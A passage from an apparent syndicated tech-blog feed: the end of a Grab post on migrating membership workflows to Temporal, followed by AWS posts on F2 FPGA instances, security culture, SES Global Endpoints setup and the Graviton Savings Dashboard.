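                break          # only the failed step is retried
            except ConnectionError:
                continue
        else:
            raise RuntimeError(f"{benefit} kept failing")
    return state


rewards = FakeRewardService()
final_state = run_workflow(rewards)
print(rewards.awards)  # ['Benefits1', 'Benefits2']
```

Each benefit is granted exactly once even though the second step failed on its first attempt.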

Figure 9. Total open production incidents reported by users related to membership issues from January to October 2024.

Embracing Temporal: Challenges and mindset shift

Transitioning to Temporal was quite a paradigm shift for our team. Rather than managing SQS state transitions, we could now focus on our core business logic while Temporal handled the complexities of state management, error handling, and retries. This change allowed us to streamline development, making our processes more intuitive.

However, this shift wasn’t without its challenges. Temporal features such as Workflow and Activity design, deterministic execution, and built-in retry mechanisms required a steep learning curve. We had to quickly adapt to Temporal’s new way of thinking, and while it took some time to master these tools, they ultimately led to a more robust and scalable system. The transition to Temporal brought not only technical improvements but also a new mindset for solving problems efficiently.

Key takeaways and conclusion

After a thorough analysis, we decided to transition our architecture to Temporal, as it outperformed the alternatives on nearly every evaluation criterion. Here are the key takeaways from our experience:

  • Understand the problem, fix it for the future: Migrating legacy systems requires more than just patching up issues; it demands a deep dive into the root causes. For us, that meant addressing challenges in scalability, resiliency, and concurrency head-on to prevent future headaches.
  • Focusing on what matters: By adopting Temporal workflow orchestration, we could shift our focus to what really counts, core business logic. The result? An 80% reduction in production incidents and a much smoother post-migration experience.
  • Resilience and flexibility at scale: Temporal provided the infrastructure we needed to handle millions of subscribers with more robust processes for retries, idempotency, and state management. These features played a key role in ensuring the system remained stable and flexible as our user base grew.
  • The learning curve pays off: Every system migration has its challenges, but the payoff was transformative. Despite the initial hiccups, moving to Temporal allowed us to scale GrabUnlimited seamlessly while significantly improving both our development processes and the overall user experience.

Stay tuned for Part 2, where we dive into the challenges of the migration and the lessons learned along the way. How did we seamlessly migrate millions of users to this new architecture without disrupting their memberships? How did we implement Temporal without pausing development for months? And what roadblocks did we encounter as we scaled this solution to all our users? We’ll answer these questions and more in the next post.

Nothing would have been possible without the unwavering support of Abegail Nato Alcantara, Andrys Silalahi, Pavel Sidlo, and Renu Yadav.

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 700 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Definition of terms

  1. Temporal: Temporal is an open-source workflow orchestration platform. It allows developers to build scalable and reliable applications using familiar development patterns and easy-to-use tools. 

  2. Cron job: A cron job is a time-based job scheduler in Unix-like operating systems. Users can schedule jobs (commands or scripts) to run periodically at fixed times, dates, or intervals. 

  3. State machine: A state machine is a behavioural model used in computer science. It represents a system in terms of states and transitions between those states. 

  4. Redis lock mechanism: Redis is an in-memory data structure store that can be used as a database, cache, and message broker. A Redis lock mechanism is a way to ensure that only one computer in a distributed network can process a certain piece of code at a time. 

  5. Vertical scaling: also known as “scaling up”, is the process of adding more resources (such as memory, CPUs, or storage) to an existing server or database to enhance its performance and capacity. This differs from horizontal scaling, also known as “scaling out”, which is the process of adding more servers or nodes to a system to handle increased load. 

  6. Concurrency: In computing, concurrency is the ability of different parts or units of a program, algorithm, or problem to be executed out-of-order or in partial order, without affecting the final outcome. 

  7. Resiliency: refers to the ability of a system or application to quickly recover from failures and continue its intended operation without significant interruption. 

  8. Exponential backoff: Exponential backoff is an algorithm that uses feedback to multiplicatively decrease the rate of some process, in order to gradually find an acceptable rate. In the context of the article, it refers to a strategy for retrying failed tasks with increasing wait times between retries. 

  9. Idempotency: An operation is idempotent if the result of performing it once is exactly the same as the result of performing it repeatedly without any intervening actions. 

  10. Scalability: The ability of a system to handle increased workload or demand by adding resources. 

  11. Reliability: The capacity of a system to consistently perform its intended functions without failure. 

  12. Resiliency: The ability of a system to recover quickly and effectively from failures or disruptions, ensuring continuity of service. 

  13. Flexibility: The architecture should be flexible enough to accommodate future changes in requirements. 

  14. Testability: The architecture should allow for effective testing to ensure the system works as expected. 

Now Available – Second-Generation FPGA-Powered Amazon EC2 instances (F2)

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/now-available-second-generation-fpga-powered-amazon-ec2-instances-f2/

Equipped with up to eight AMD Field-Programmable Gate Arrays (FPGAs), AMD EPYC (Milan) processors with up to 192 cores, High Bandwidth Memory (HBM), up to 8 TiB of SSD-based instance storage, and up to 2 TiB of memory, the new F2 instances are available in two sizes, and are ready to accelerate your genomics, multimedia processing, big data, satellite communication, networking, silicon simulation, and live video workloads.

A Quick FPGA Recap
Here’s how I explained the FPGA model when we previewed the first generation of FPGA-powered Amazon Elastic Compute Cloud (Amazon EC2) instances:

One of the more interesting routes to a custom, hardware-based solution is known as a Field Programmable Gate Array, or FPGA. In contrast to a purpose-built chip which is designed with a single function in mind and then hard-wired to implement it, an FPGA is more flexible. It can be programmed in the field, after it has been plugged in to a socket on a PC board. Each FPGA includes a fixed, finite number of simple logic gates. Programming an FPGA is “simply” a matter of connecting them up to create the desired logical functions (AND, OR, XOR, and so forth) or storage elements (flip-flops and shift registers). Unlike a CPU which is essentially serial (with a few parallel elements) and has fixed-size instructions and data paths (typically 32 or 64 bit), the FPGA can be programmed to perform many operations in parallel, and the operations themselves can be of almost any width, large or small.

Since that launch, AWS customers have used F1 instances to host many different types of applications and services. With a newer FPGA, more processing power, and more memory bandwidth, the new F2 instances are an even better host for highly parallelizable, compute-intensive workloads.

Each of the AMD Virtex UltraScale+ HBM VU47P FPGAs has 2.85 million system logic cells and 9,024 DSP slices (up to 28 TOPS of DSP compute performance when processing INT8 values). The FPGA Accelerator Card associated with each F2 instance provides 16 GiB of High Bandwidth Memory and 64 GiB of DDR4 memory per FPGA.

Inside the F2
F2 instances are powered by 3rd generation AMD EPYC (Milan) processors. In comparison to F1 instances, they offer up to 3x as many processor cores, up to twice as much system memory and NVMe storage, and up to 4x the network bandwidth. Each FPGA comes with 16 GiB High Bandwidth Memory (HBM) with up to 460 GiB/s bandwidth. Here are the instance sizes and specs:

| Instance Name | vCPUs | FPGAs | FPGA Memory (HBM / DDR4) | Instance Memory | NVMe Storage | EBS Bandwidth | Network Bandwidth |
|---|---|---|---|---|---|---|---|
| f2.12xlarge | 48 | 2 | 32 GiB / 128 GiB | 512 GiB | 1900 GiB (2x 950 GiB) | 15 Gbps | 25 Gbps |
| f2.48xlarge | 192 | 8 | 128 GiB / 512 GiB | 2,048 GiB | 7600 GiB (8x 950 GiB) | 60 Gbps | 100 Gbps |

The high-end f2.48xlarge instance supports the AWS Cloud Digital Interface (CDI) to reliably transport uncompressed live video between applications, with instance-to-instance latency as low as 8 milliseconds.

Building FPGA Applications
The AWS EC2 FPGA Development Kit contains the tools that you will use to develop, simulate, debug, compile, and run your hardware-accelerated FPGA applications. You can launch the kit’s FPGA Developer AMI on a memory-optimized or compute-optimized instance for development and simulation, then use an F2 instance for final debugging and testing.

The tools included in the developer kit support a variety of development paradigms, tools, accelerator languages, and debugging options. Regardless of your choice, you will ultimately create an Amazon FPGA Image (AFI) which contains your custom acceleration logic and the AWS Shell which implements access to the FPGA memory, PCIe bus, interrupts, and external peripherals. You can deploy AFIs to as many F2 instances as desired, share with other AWS accounts or publish on AWS Marketplace.

If you have already created an application that runs on F1 instances, you will need to update your development environment to use the latest AMD tools, then rebuild and validate before upgrading to F2 instances.

FPGA Instances in Action
Here are some cool examples of how F1 and F2 instances can support unique and highly demanding workloads:

Genomics – Multinational pharmaceutical and biotechnology company AstraZeneca used thousands of F1 instances to build the world’s fastest genomics pipeline, able to process over 400K whole genome samples in under two months. They will adopt Illumina DRAGEN for F2 to realize better performance at a lower cost, while accelerating disease discovery, diagnosis, and treatment.

Satellite Communication – Satellite operators are moving from inflexible and expensive physical infrastructure (modulators, demodulators, combiners, splitters, and so forth) toward agile, software-defined, FPGA-powered solutions. Using the digital signal processor (DSP) elements on the FPGA, these solutions can be reconfigured in the field to support new waveforms and to meet changing requirements. Key F2 features such as support for up to 8 FPGAs per instance, generous amounts of network bandwidth, and support for the Data Plane Development Kit (DPDK) using Virtual Ethernet can be used to support processing of multiple, complex waveforms in parallel.

Analytics – NeuroBlade’s SQL Processing Unit (SPU) integrates with Presto, Apache Spark, and other open source query engines, delivering faster query processing and market-leading query throughput efficiency when run on F2 instances.

Things to Know
Here are a couple of final things that you should know about the F2 instances:

Regions – F2 instances are available today in the US East (N. Virginia) and Europe (London) AWS Regions, with plans to extend availability to additional regions over time.

Operating Systems – F2 instances are Linux-only.

Purchasing Options – F2 instances are available in On-Demand, Spot, Savings Plan, Dedicated Instance, and Dedicated Host form.

Jeff;

Securing the future: building a culture of security

Post Syndicated from Carter Spriggs original https://aws.amazon.com/blogs/security/securing-the-future-building-a-culture-of-security/

According to a 2024 Verizon report, nearly 70% of data breaches occurred because a person was manipulated by social engineering or made some type of error. This highlights the importance of human-layer defenses in an organization’s security strategy. In addition to technology, tools, and processes, security requires awareness and action from everyone in an organization to recognize anomalies, escalate potential issues, and ultimately, mitigate risk.

Organizations that invest in a culture of security see better employee adoption of security controls, improved cybersecurity behavior, and a more effective use of cybersecurity resources, according to a 2024 Gartner analysis. This aligns with our own experience at AWS, where we deeply invest in our culture of security. Our leadership prioritizes security and builds it into our organizational structure. Everyone, regardless of role, views security as a shared responsibility. Security advocates and advisors are embedded in our teams to share their expertise, and innovation empowers our people to move fast while staying secure.

Building and maintaining a culture of security requires constant investment and focus. In our recent culture of security series with The Guardian, we share perspectives from AWS leaders on some of the most common questions that people ask us about how to create a culture of security.

The journey to creating a culture of security begins with the first step. Although this journey looks different for every organization, sharing what we’ve learned may spur ideas for how you can help create a security-first mindset in your own team or organization.

We invite you to explore the series and learn more about how AWS sustains a strong culture of security.

 
 

Carter Spriggs

Carter is a Product Marketing Manager at AWS.

How to Make Simple Email Service Resilient Across Two AWS Regions with Global Endpoints

Post Syndicated from Zip Zieper original https://aws.amazon.com/blogs/messaging-and-targeting/how-to-make-simple-email-service-resilient-across-two-aws-regions-with-global-endpoints/

Introduction

Amazon Simple Email Service (SES) recently announced Global Endpoints, a major enhancement to its email sending features. This new capability improves the availability and reliability of SES API v2 email sending workloads by automatically distributing messages across the Primary and Secondary AWS Regions in an active/active configuration. When Global Endpoints detects degradation in either the Primary or Secondary SES region, the feature automatically shifts all traffic to the healthy region; no customer intervention is needed.

Multi-Region SES Configuration Challenges

Customers face significant difficulties in correctly implementing a multi-region or disaster recovery setup. The process requires careful curation of the systems along the failover path and ensuring that those systems are highly available. Ironically, the system designed to trigger failover can itself fail when needed most. For many SES customers, the effort required to design, build, test, monitor, and maintain a two-region SES system outweighs the benefits.

SES Global Endpoints eliminates the need for these complex, custom workarounds. The feature provides a straightforward solution for maintaining email sending during unexpected regional disruptions. Global Endpoints’ built-in safeguards ensure email infrastructure remains resilient when it matters most. Please note that at launch, Global Endpoints does not support SMTP or VPC endpoint access.

SES Global Endpoints: Key Technological Components

Global Endpoints utilizes four new SES components that work together to provide a seamless and reliable multi-region email sending experience:

  1. Multi-Region Endpoint (MREP) is a new type of SES endpoint that automatically distributes email traffic across two AWS regions.
  2. Deterministic Easy DKIM Identities (DEED) makes it easy to set up multi-region identities without having to make any DNS changes.
    1. Read the blog introducing SES DEED for more information.
  3. Updated AWS SES Console Tool walks you through the process and simplifies the duplication of Domain Identities, Configuration sets, and Sending limits across regions.
  4. Readiness Checks in the SES console verify uniformity between configurations of key resources in both the Primary and Secondary SES regions.

How SES Global Endpoints work


Figure 1 – SES Global Endpoints with two healthy regions.

Global Endpoints are resources that distribute your SES outbound workloads across two AWS Regions. When you set up Global Endpoints, you select a Primary Region (where the actual Endpoint is created) and a Secondary Region. When configured, a new Global Endpoints resource, called “multi-region endpoint” (MREP) is created and managed. Developers will need to update their SES v2 API enabled applications and services to use their unique MREP as the entry point to SES for their email sending requests.

The Global Endpoints configuration requires that your sending domain identity(s) is verified in both the Primary and Secondary regions. SES Global Endpoints uses DEED to simplify this process. DEED is a new feature that generates consistent DKIM tokens across all AWS Regions based on a Parent Domain Identity that is configured with Easy DKIM. This consistency allows SES to automatically verify a domain identity in the Secondary region once it’s verified in the Primary region, without requiring additional DNS record updates. Customers do not need to make any additional changes other than activating the DEED identity type. When customers expand their sending workload’s geographic footprint, or reconfigure their Global Endpoints settings in the future, their DEED identities will continue to be available and managed automatically. You can learn more about DEED from this post.

Global Endpoints works alongside other SES services, such as Virtual Deliverability Manager (VDM). Once Global Endpoints are enabled, you’ll continue to see per-region data on email sending performance in VDM. If you’ve configured event destinations like CloudWatch, SNS, or Firehose, you can make use of those same monitoring and alerting tools in your second region as soon as you’re ready. As noted below, although Configuration Sets are automatically duplicated in the Secondary region, you must manually duplicate your SES event destinations in those Configuration Sets.

It is important to understand that Global Endpoints is not a failover solution for SES; it is an active-active implementation. When no regional impairment exists, SES Global Endpoints distributes sending traffic across two AWS regions. Customers who use the SES shared IP sending pool do not need to make any changes; Global Endpoints will use the SES shared IP pool in the Secondary region. Customers who use standard dedicated IPs must manually set up an equivalent number of dedicated IPs in the Secondary region. Once properly configured, Global Endpoints will keep the dedicated IPs warm in both regions as long as you use the MREP and maintain a steady sending volume.

For example, when SES’s regional health monitoring detects degradation in the Primary region (as shown in the diagram below), the MREP automatically shifts all traffic to the healthy region. This illustrates the need for matching configurations in both regions, since all traffic will be sent through a single region (in this example, the Secondary region) for as long as the impairment exists. When SES’s regional health monitoring detects that the impaired region is back to normal, traffic is once again distributed across both regions. Importantly, no customer intervention is needed; SES Global Endpoints automatically and dynamically monitors and manages the traffic distribution via the MREP.


Figure 2 – SES Global Endpoints with one impaired region.

The key benefits of using Global Endpoints include:

  • Simplified multi-region configuration
  • Automatic routing between two regions with no delay
  • More resilient email sending

Global Endpoints: Setup and Use

Using the SES Console, the Global Endpoint setup process assists in duplicating the key artifacts and sending limits from your Primary Region to your Secondary Region. This process ensures that both regions have equivalent verified identities, configuration sets, and approved sending limits sufficient for all of the expected volume. Customers can manually duplicate these key artifacts using the SES API v2 or CloudFormation, but we recommend using the SES console because it simplifies these steps.

Once the Global Endpoint is ready, key resources have been duplicated, and the application or service has been updated to use the new MREP, SES Global Endpoints automatically routes your outbound traffic evenly between your primary and secondary regions using the multi-region endpoint (MREP). If the MREP detects degraded performance in the Primary or Secondary region, it will automatically route all SES traffic to the healthy region until the impairment is resolved.
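The routing behavior described above can be modeled with a short sketch. This is only an illustration of the active-active idea, not how SES implements the MREP: `choose_region` is a hypothetical function, the region names are examples, and raising an error when neither region is healthy is an assumption made for the sketch.

```python
import random


def choose_region(health, rng=random):
    """Pick the region for one send request.

    `health` maps a region name to True when that region is healthy.
    With both regions healthy, requests are spread evenly on average;
    with one impaired, every request goes to the healthy one.
    """
    healthy = [region for region, ok in health.items() if ok]
    if not healthy:
        raise RuntimeError("no healthy region available")
    return rng.choice(healthy)


both_healthy = {"us-east-1": True, "us-west-2": True}
primary_impaired = {"us-east-1": False, "us-west-2": True}

print(choose_region(both_healthy))      # either region
print(choose_region(primary_impaired))  # us-west-2
```

The second case is why each region needs sending limits and configuration sized for the full workload, not half of it.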

Preparing the Primary Region

The high-level steps to set up Global Endpoints using the SES Console are below. Note – you must already have a primary SES region that is fully operational, with production access and at least one fully verified sending identity, before setting up Global Endpoints.

Create Global Endpoint

  1. Open the SES console in the Primary AWS region.
  2. In the navigation pane, choose Global Endpoints.
  3. Choose Create Global Endpoint.
  4. Select a Secondary Region from the dropdown menu. (Your Primary Region defaults to the region you are signed in to in the console.)
  5. Review the configuration and choose Create.

The creation process may take a few seconds. Once completed, the status of your Global Endpoint will change to “Ready.”


Preparing the secondary region

Once your Global Endpoint is ready, you must ensure that your email sending configuration, including all its components (Domain Identities, Configuration sets, email templates, and sending limits), is consistent across the primary and secondary regions before using the Global endpoint to send email. This alignment is crucial to avoid potential issues and ensure proper email delivery and tracking.

The new Region duplication feature in the SES console assists you by automatically duplicating resources and duplicating account-level settings from the primary to the secondary region, ensuring that both regions have equivalent configurations.

The high-level steps to set up the secondary region for use with Global Endpoints using the SES Console are below. If you’d like to use the AWS CLI to manually duplicate these resources, consult the SES v2 API documentation.

Duplicating verified domain identities

Next you’ll use the Duplicate verified domain identities feature in the SES console to create one or more domain identities in the Secondary Region. SES will then use DEED to verify the domain identities in the Secondary Region. Note that DEED can only be used if the Primary Domain Identity is already configured with Easy DKIM. Domain identities that are verified with BYODKIM will need to be created manually in the Secondary Region, as DEED is not applicable in this case.

Important – It’s crucial that both Primary and Secondary Regions have the equivalent verified identities and configuration sets that you intend to send email with, along with matching sending limits to ensure proper functionality of the Global endpoint. Any discrepancies could cause delivery failures, diminished failover reliability, and missing metrics.

To duplicate identities from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. Under the Region duplication tab, choose Duplicate identities.
  3. Select the identities you want to duplicate followed by Confirm.

To duplicate configuration sets from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. From the Region duplication tab, choose Duplicate configuration sets.
  3. Select the configuration sets you want to duplicate followed by Confirm.

Important Notes:

  • When duplicating configuration sets across regions, Event destinations and Reputation settings require manual reconfiguration in the Secondary Region to match the Primary Region’s setup. Since SES event destinations are region-specific, you’ll need to manually recreate these configurations in each region. For cross-regional monitoring and event routing, you can refer to additional AWS documentation for services like CloudWatch (cross-region dashboards), SNS (cross-region message delivery), and EventBridge (cross-region event routing) to develop a comprehensive multi-region event strategy.
  • If you are using SES email template resources, those templates need to be manually duplicated into the Secondary Region (the console is currently unable to perform this action).
  • You must manually synchronize any changes made to the Primary Region’s configuration sets to the Secondary Region to maintain sending integrity. This includes adding or removing standard dedicated IPs in both regions so that either region has the IPs required to manage the expected throughput in the case of a regional event or impairment.

The Duplicate production limits feature allows you to:

  • Check if production limits are aligned between primary and secondary regions
  • Request a limit increase in the secondary region if needed

To duplicate production limits from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. From the Region duplication tab, verify the status in the Duplicate production limits card. If the status displays Sending limits not aligned, choose Duplicate production limits.
  3. The Service Quotas page opens in the secondary region where you can request increases to “Sending quota” and “Sending rate” to match the values from the primary region.

Note – SES checks if sending limits are aligned between regions and allows you to request limit increases in the secondary region if needed. We recommend that you request the maximum quota you’re eligible for in both regions. While email traffic is distributed amongst both regions under normal operating conditions, during a failover event, the full volume of email traffic will be sent to one region and its limits should be enough to handle the full volume load.
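The alignment check described in the note can also be approximated outside the console. The following is a minimal sketch, assuming boto3 is installed and credentials are configured; the helper names quota_gaps and fetch_send_quota are hypothetical, and the Region names in the usage note are placeholders. It compares the SendQuota structure returned by the SES API v2 GetAccount operation in each Region.

```python
def quota_gaps(primary: dict, secondary: dict) -> list:
    """Return the SendQuota fields where the secondary Region is below the primary."""
    gaps = []
    for field in ("Max24HourSend", "MaxSendRate"):
        if secondary.get(field, 0) < primary.get(field, 0):
            gaps.append(field)
    return gaps


def fetch_send_quota(region: str) -> dict:
    """Fetch the SendQuota structure for one Region (requires boto3 and credentials)."""
    import boto3  # imported lazily so quota_gaps can be used without boto3

    client = boto3.client("sesv2", region_name=region)
    return client.get_account()["SendQuota"]
```

For example, quota_gaps(fetch_send_quota("us-east-1"), fetch_send_quota("us-west-2")) returns an empty list when the secondary Region's sending quota and sending rate are at least as high as the primary's.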

If any manual steps are required to complete the Global Endpoint creation, they will be shown in the SES Console:

manual steps warning

When the Global Endpoint is fully configured, an MREP is created with an Endpoint ID. You will use this Endpoint ID when reconfiguring your SendEmail and SendBulkEmail API calls. (Note: Global Endpoints MREPs are supported only by SES API v2. The feature is not available through SMTP or VPC endpoints.)

Now you’re ready to send your first email through SES Global Endpoints and your MREP!

Once you’ve obtained the Endpoint ID of your Global endpoint (this is the MREP), update your applications’ SendEmail or SendBulkEmail API calls to pass the Endpoint ID value in the --endpoint-id parameter.

Here’s an example of how to specify the Endpoint ID in a SendEmail API call using the AWS CLI (modify the from & to email addresses and the --endpoint-id accordingly):

aws sesv2 send-email \
--from-email-address "sender@example.com" \
--destination "ToAddresses=recipient@example.com" \
--content "Simple={Subject={Data=Test email,Charset=UTF-8},Body={Text={Data=This is a test email sent using Amazon SES Global endpoints.,Charset=UTF-8}}}" \
--endpoint-id "abcdef12.g3h"
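For applications that use an SDK rather than the CLI, the same call can be sketched in Python. This is an illustrative sketch, not a reference implementation: it assumes a boto3 release recent enough to accept the EndpointId parameter on the sesv2 send_email operation, and the helper names, addresses, Region, and Endpoint ID are placeholders.

```python
def build_send_email_request(sender: str, recipient: str, endpoint_id: str) -> dict:
    """Build the keyword arguments for an SES API v2 SendEmail call."""
    return {
        "FromEmailAddress": sender,
        "Destination": {"ToAddresses": [recipient]},
        "Content": {
            "Simple": {
                "Subject": {"Data": "Test email", "Charset": "UTF-8"},
                "Body": {
                    "Text": {
                        "Data": "This is a test email sent using Amazon SES Global endpoints.",
                        "Charset": "UTF-8",
                    }
                },
            }
        },
        # Routes the request through the Global endpoint (MREP).
        "EndpointId": endpoint_id,
    }


def send(request: dict, region: str = "us-east-1") -> dict:
    """Send the request (requires boto3 and credentials; the Region is a placeholder)."""
    import boto3  # imported lazily so the request builder works without boto3

    return boto3.client("sesv2", region_name=region).send_email(**request)
```

Keeping the request builder separate from the network call makes it straightforward to unit test the payload before sending real email.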

The Global Endpoints console page provides summary observability metrics on the combined workload and a unified view of your email sending volume across both the primary and secondary regions. You can access these metrics through the Cross-region metrics tab on the Global endpoint details page in the SES console.

Conclusion

By using an SES Global Endpoint in their SES API v2 applications and services, SES customers benefit from uninterrupted email delivery during regional service issues. SES Global Endpoints automatically distributes sending workloads across two AWS Regions, significantly enhancing resilience against regional outages. When dedicated IP addresses are used, the feature keeps them warmed up in both Regions, and it automatically shifts traffic to the healthy Region when the other is impaired, without requiring customer intervention. SES Global Endpoints eliminates the pain points typically associated with manually built, multi-region SES sending systems.

The Global Endpoints console tools provide quick and easy setup and include readiness checks to identify and mitigate potential misconfigurations. These enhancements simplify the configuration and management process, making it easier for customers to maintain a robust email sending infrastructure.

Overall, SES Global Endpoints addresses customer needs for a more reliable and easily managed email sending system, automating critical processes and providing robust tools for setup and maintenance. This significant improvement to the email sending experience is expected to benefit AWS customers across various industries and use cases.

Call to Action

Get started with SES Global Endpoints today to enhance your email sending resilience!

  • Visit the AWS Console to enable this feature for your account
  • Review the comprehensive documentation for step-by-step guidance.
  • For personalized assistance, don’t hesitate to contact AWS Support or your AWS account team.

Elevate your email infrastructure now to ensure uninterrupted communication with your customers, even in the face of regional disruptions.

Accelerate your AWS Graviton adoption with the AWS Graviton Savings Dashboard

Post Syndicated from aostan original https://aws.amazon.com/blogs/compute/accelerate-your-aws-graviton-adoption-with-the-aws-graviton-savings-dashboard/

This post is written by Rajani Guptan, Rosa Corley and Shankar Gopalan.

Are you looking to optimize your AWS infrastructure costs while maintaining high performance? AWS Graviton is a custom-built CPU developed by Amazon Web Services (AWS), and it is designed to deliver the best price performance for a broad range of cloud workloads running on Amazon Elastic Compute Cloud (Amazon EC2). Graviton-based instances provide up to 40% better price performance while using up to 60% less energy than comparable EC2 instances.

AWS users recognize that migrating existing workloads to Graviton-based instances results in better price performance. However, migrating to Graviton necessitates identifying comparable instance types, understanding the performance impacts, and estimating the savings opportunities. Furthermore, prioritizing and tracking migration efforts at scale across a diverse set of services such as Amazon EC2, Amazon Relational Database Service (Amazon RDS), Amazon ElastiCache, and Amazon OpenSearch can be challenging. Therefore, AWS has developed the AWS Graviton Savings Dashboard to help users address these complexities and accelerate their Graviton migration.

In this post, we walk you through the dashboard architecture, deployment steps, features, and capabilities. Whether you are an Executive, FinOps Practitioner, Product Owner, or in Engineering, you can use the dashboard to get the following:

  • Centralized visibility across accounts/workloads: The dashboard consolidates and tracks Graviton adoption across multiple management accounts, member accounts, and AWS Regions in a single view.
  • Graviton support across key AWS services: There are dedicated tabs allowing users to review current Graviton usage and potential savings across AWS compute and managed services.
  • Granular resource-level visibility for managed services: The dashboard provides granular resource level visibility for managed services such as Amazon RDS, ElastiCache, and OpenSearch.
  • Accurate savings and unit cost estimations: The dashboard provides accurate cost estimations for existing and comparable Graviton-based instance types by using the existing AWS Cost and Usage Report (CUR) data with the AWS public pricing API.
  • Categorization of migration effort: The dashboard categorizes Graviton migration opportunities into two main groups: Typically Easy and Requires Additional Planning, for EC2 instances. It also identifies Graviton-eligible resources for managed services, which may need version or database upgrades. This categorization helps users prioritize their engineering efforts for migration.

Architecture overview

The solution integrates AWS CUR, the AWS SDK, and AWS Public pricing API to generate comprehensive data on the usage, cost, and resource inventory. This data is stored in Amazon S3 and analyzed using Amazon Athena, providing deep insights into potential cost savings. Then, the results are visualized through Amazon QuickSight, enabling stakeholders to collaborate effectively and make informed, data-driven decisions, as shown in the following figure.

Graviton Savings Dashboard architecture diagram

Figure 1: Graviton Savings Dashboard architecture diagram

Although the solution typically costs between $50–$100 per month, the potential return on investment is substantial. The dashboard often identifies measurable cost savings that significantly outweigh its operational expenses. Moreover, it offers additional productivity benefits by streamlining the process of adopting Graviton, saving valuable time and effort for your team. For a detailed breakdown of the dashboard’s cost structure, we invite you to explore our comprehensive Graviton Savings Dashboard Cost Breakdown guide.

Deployment

The Graviton Savings Dashboard is part of the Cloud Intelligence Dashboards framework. You can deploy it using AWS CloudFormation Templates and a ‘cid-cmd’ command line tool. Prior to deploying the dashboard, make sure that you’ve met the prerequisites. These include the following:

  1. Setting up your AWS CUR: We highly recommend that you complete Steps 1 and 2 from the Cloud Intelligence Dashboard Deployment Guide. This makes sure that your CUR is set up with settings that allow for easy installation and troubleshooting if necessary.
  2. Setting up the Inventory Collector Module of the Optimization Data Collection lab: This provides automation to collect metadata and pricing for Amazon RDS, ElastiCache, and OpenSearch for all accounts in your AWS Organizations and AWS Regions.
  3. Preparing QuickSight: If you’re an existing QuickSight user, then you can skip this step. If not, then you must complete Step 3.1 to Prepare QuickSight.

When the prerequisites are in place, you can deploy the dashboard by running three simple commands (shown as follows) using a terminal application with permissions to run API requests in your AWS account.

python3 -m ensurepip --upgrade

pip3 install --upgrade cid-cmd

cid-cmd deploy --dashboard-id graviton-savings

For detailed instructions about the deployment and prerequisites, refer to the AWS Well-Architected Cost Optimization lab.

Examining the results: unlocking insights from your Graviton Savings Dashboard

Now that you’ve successfully deployed the dashboard, we can explore its powerful features and uncover valuable insights. As you read through this section, we encourage you to interact with your dashboard to familiarize yourself with the dashboard’s intuitive interface and functionality.

The Graviton Savings Dashboard is organized into service-specific tabs, each containing two key sections:

Current Graviton Usage and Savings (top section): This section highlights the tangible benefits you’ve already achieved by migrating workloads to Graviton. You can explore the following:

    • Monthly Graviton adoption trends
    • Usage distribution across different accounts, Regions, and processor types
    • Popular Graviton instance families
    • Unit cost trends
    • Realized Graviton savings

These metrics are calculated by comparing your Graviton usage to comparable non-Graviton instances, which provides a clear picture of your cost optimization efforts, as shown in the following figure.

Current Amazon EC2 Graviton Usage and Savings

Figure 2: Current Amazon EC2 Graviton Usage and Savings
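The comparison behind these metrics can be illustrated with a small worked example. This is a hedged sketch of the arithmetic only, not the dashboard's actual queries; the function name and the hourly rates in the usage note are hypothetical and are not real AWS prices.

```python
def realized_savings(usage_hours: float, graviton_rate: float, comparable_rate: float):
    """Return (amount saved, percent saved) versus a comparable non-Graviton instance."""
    graviton_cost = usage_hours * graviton_rate
    comparable_cost = usage_hours * comparable_rate
    saved = comparable_cost - graviton_cost
    percent = (saved / comparable_cost * 100.0) if comparable_cost else 0.0
    return saved, percent
```

With 1,000 instance hours at a hypothetical Graviton rate of 0.08 per hour against a hypothetical comparable rate of 0.10 per hour, the function reports roughly 20 saved, or about 20 percent.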

Potential Graviton Savings Opportunities (bottom section): This section identifies areas where you can further optimize costs by adopting Graviton instances. It provides the following:

  • Actionable migration insights
  • Estimated implementation effort
  • Potential savings breakdowns by account, instance family/type, OS, and purchase option

These insights compare potential Graviton savings across various attributes, enabling targeted decision-making for future Graviton migrations and cost optimizations, as shown in the following figure.

Amazon EC2 Graviton Opportunity

Figure 3: Amazon EC2 Graviton Opportunity

Using dashboard insights: a FinOps team use case

In this section we explore a use case where you, as the lead of the Cloud Center of Excellence Team, use the insights from this dashboard to address concerns raised by your Chief Technology Officer (CTO).

Your CTO approaches you with the following questions:

  1. Is our organization using the price-performance benefits of Graviton-based EC2 instances?
  2. How do our Graviton usage, spend, and savings compare to other processor types within our overall EC2 compute spend?

Step 1: Initial analysis

You begin generating summary reports from the Current Graviton Usage (Figure 2) and Graviton Opportunity (Figure 3) sections of the dashboard. After reviewing these reports, the CTO asks you to engage with the Engineering team to evaluate potential opportunities for increasing Graviton coverage.

Step 2: Engaging with Engineering on Graviton Migration

When you present the summary reports to the engineering manager, they express interest in understanding the effort level required for this project. This information can help them allocate resources and prioritize workloads by identifying what can be started in the short term and what needs additional planning.

Step 3: Detailed analysis

As shown in the following figure, the Engineering team can focus on identifying candidate workloads with the most significant savings impact by segmenting the dashboard data by:

  • Implementation efforts
  • Linked accounts
  • Regions
  • Instance types
  • Operating systems

Amazon EC2 Graviton opportunity breakdown

Figure 4: Amazon EC2 Graviton opportunity breakdown

Furthermore, the team can use the dashboard to determine comparable Graviton-based instances for migration and their potential savings, as shown in the following figure.

Potential Graviton Savings Details

Figure 5: Potential Graviton Savings Details

Step 4: Tracking progress

Over time, the FinOps team and Engineering team can showcase the Graviton migration successes by highlighting the increasing Graviton coverage and realized savings using the dashboard’s charts (Figure 2).

Broader application:

Although this post primarily focuses on EC2 instance migration, the dashboard also provides similar insights for AWS managed services such as Amazon RDS, ElastiCache, and OpenSearch. Individual tabs with visualizations guide your Graviton adoption across these services, as shown in the following figure.

Potential graviton savings details

Figure 6: Graviton Savings Dashboard

